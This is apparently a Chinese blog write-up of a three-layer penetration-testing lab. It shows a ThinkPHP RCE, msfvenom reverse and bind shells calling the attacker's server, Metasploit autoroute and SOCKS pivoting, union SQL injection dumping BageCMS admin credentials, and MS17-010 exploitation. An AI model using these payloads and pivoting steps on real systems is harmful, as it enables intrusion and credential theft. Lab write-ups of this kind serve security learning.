首页 > 其他分享 >cfs三层靶机内网渗透

cfs三层靶机内网渗透

时间:2023-02-23 12:11:36浏览次数:53  
标签:24 set run 192.168 msf 20 靶机 三层 cfs

cfs三层靶机内网渗透

靶机下载地址:https://pan.baidu.com/share/init?surl=O9pgm9UZCSIdifMEb0E9ZA#list/path=%2F
提取码:qazz
具体的环境配置以及靶机IP如下图所示

攻击机 装了msf的腾讯云主机和本地的一台kail
target1(centos7) 192.168.99.122 192.168.52.16
target2(ubuntu) 192.168.52.15  192.168.33.22
target3(windows7) 192.168.33.33

image-20230120162633717

target1使用ftp代理到了公网上面

image-20230120162954485

image-20230120163027740

入口点就为http://45.113.0.116/

image-20230120163124075

打开发现为thinkphp框架,使用工具对其检测,发现存在tp5_construct_code_exec_4漏洞

image-20230120163324902

获取webshell

image-20230120163458342

蚁剑连接,连接成功

image-20230120163624624

然后将该主机上线msf,方便我们进行后渗透,生成一个反向连接linux木马,

[root@VM-4-12-centos ~]# msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=43.142.178.54 lport=1234 -f elf>222.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes

用蚁剑上传到目标机中,赋予权限

image-20230120164150394

然后再到msf中开启监听

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 0.0.0.0
set lport 1234
run

执行

image-20230120164536740

获取到shell

image-20230120164552860

看本地路由,有一个通向192.168.52.0段的

run get_local_subnets

image-20230120164622236

添加进去

run autoroute -p
run autoroute -s 192.168.52.0/24

image-20230120164834403

background下,然后用socket模块开启代理方便我们对target进行渗透,

use auxiliary/server/socks_proxy

set srvport 1085

run 

image-20230120165356106

配置代理管理器,可以正常连接

image-20230120165448094

浏览器尝试输入第二台靶机地址http://192.168.52.15/,发现bagecms

image-20230120165706692

习惯性的f12看一下,发现给出了提示

image-20230120165825940

尝试注入,发现添加单引号报错

image-20230120165934511

爆字段数

image-20230120170056709

image-20230120170115915

然后就使用union爆库名,表名,字段名

1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--+
1%27%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20information_schema.tables%20where%20table_schema%20=%20database()--+
1%27%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20information_schema.columns%20where%20table_name%20=%20%27bage_admin%27--+
1%27%20union%20select%201,group_concat(username),group_concat(password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin%20--+

最后就爆出来了admin的密码46f94c8de14fb36680850768ff1b7f2a

image-20230120170949302

md5解密得123qwe

image-20230120171015772

登录,发现敏感功能模板

image-20230120204014877

写入webshell

image-20230120211224211

使用菜刀走代理隧道连接

image-20230120211435560

image-20230120211545632

然后准备将此台主机上线msf,由于该主机不出网,所以需要正向去连接他

msfvenom -p linux/x64/meterpreter/bind_tcp lport=4443 -f elf>12345.elf

上传,赋予权限,并且运行

image-20230120212058814

image-20230120212424524

msf去正向连接他,成功上线

image-20230124134505153

然后还是老思路,添加路由,进入下一个网段,

run get_local_subnets
run autoroute -s 192.168.33.0/24

原先已经得知,最后一台主机存在永恒之蓝漏洞,那么继续创建代理直接打,

use auxiliary/server/socks_proxy

set srvport 1090

run

修改proxychains配置

vi /etc/proxychains4.conf

image-20230124142722836

测试代理,成功

image-20230124142913592

proxychains msfconsole  开启msf
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.33.33
run

存在永恒之蓝

image-20230124143145316

然后使用攻击模块进行攻击

use exploit/windows/smb/ms17_010_psexec
show options
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.33.33
run

最后一台拿下,结束战斗

image-20230124143937607

标签:24,set,run,192.168,msf,20,靶机,三层,cfs
From: https://www.cnblogs.com/bnlbnf/p/17147478.html

相关文章

  • Vulnhub之Fivebox 2靶机测试过程(部分)
    Fivebox2识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24......
  • MVC三层架构
    MVC三层架构什么是MVC:Model View Controller 模型、视图、控制器1.以前的方式用户直接访问控制层,控制层就可以直接操作数据库//servlet--->CRUD--->数据库//弊......
  • Vulnhub之Five86 1靶机详细测试过程
    Five861作者:jason_huawen靶机信息名称:five86:1地址:https://www.vulnhub.com/entry/five86-1,417/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Five86_1]└─$s......
  • Vulnhub:ReconForce-01.1靶机
    kali:192.168.111.111靶机:192.168.111.200信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.200访问目标ftp得到提示:Security@hackNos访问......
  • javaEE007.01使用两层实现登录 和 使用三层实现登录功能
    系列文章目录文章目录​​系列文章目录​​​​前言​​​​一、使用两层实现登录​​​​二、使用三层实现登录​​​​为什么非要三层​​前言接上一篇(即javaEE006.04)讲完......
  • Vulnhub之Kioptrix Level 2靶机详细测试过程(提权成功)
    KioptrixLevel2识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Kioptrix2-2]└─$sudonetdiscover-ieth1-r10.1.1.0/24Currentlyscanning:10.1.1.0/24......
  • Vulnhub之Kioptrix Level 1靶机详细测试过程(不同的拿shell方法,利用OpenFuck漏洞)
    KioptrixLevel1作者:jason_huawen靶机信息名称:Kioptrix:Level1(#1)地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/识别目标主机IP地址(kali㉿kal......
  • Vulnhub:mhz_c1f靶机
    kali:192.168.111.111靶机:192.168.111.197信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.197目录爆破feroxbuster-k-d1--urlhttp:/......
  • 三层架构:软件设计架构
    1,界面层(表示层/web层):用户看得到的界面。用户可以通过界面上的组件和服场器进行交互。2,业务透辑层(service层):处理业务逻辑的(最重要也是最难编写的)。不做具体的操作。3,数据......
  • Vulnhub之DC 9靶机详细测试过程
    DC9识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/DC9]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|Scree......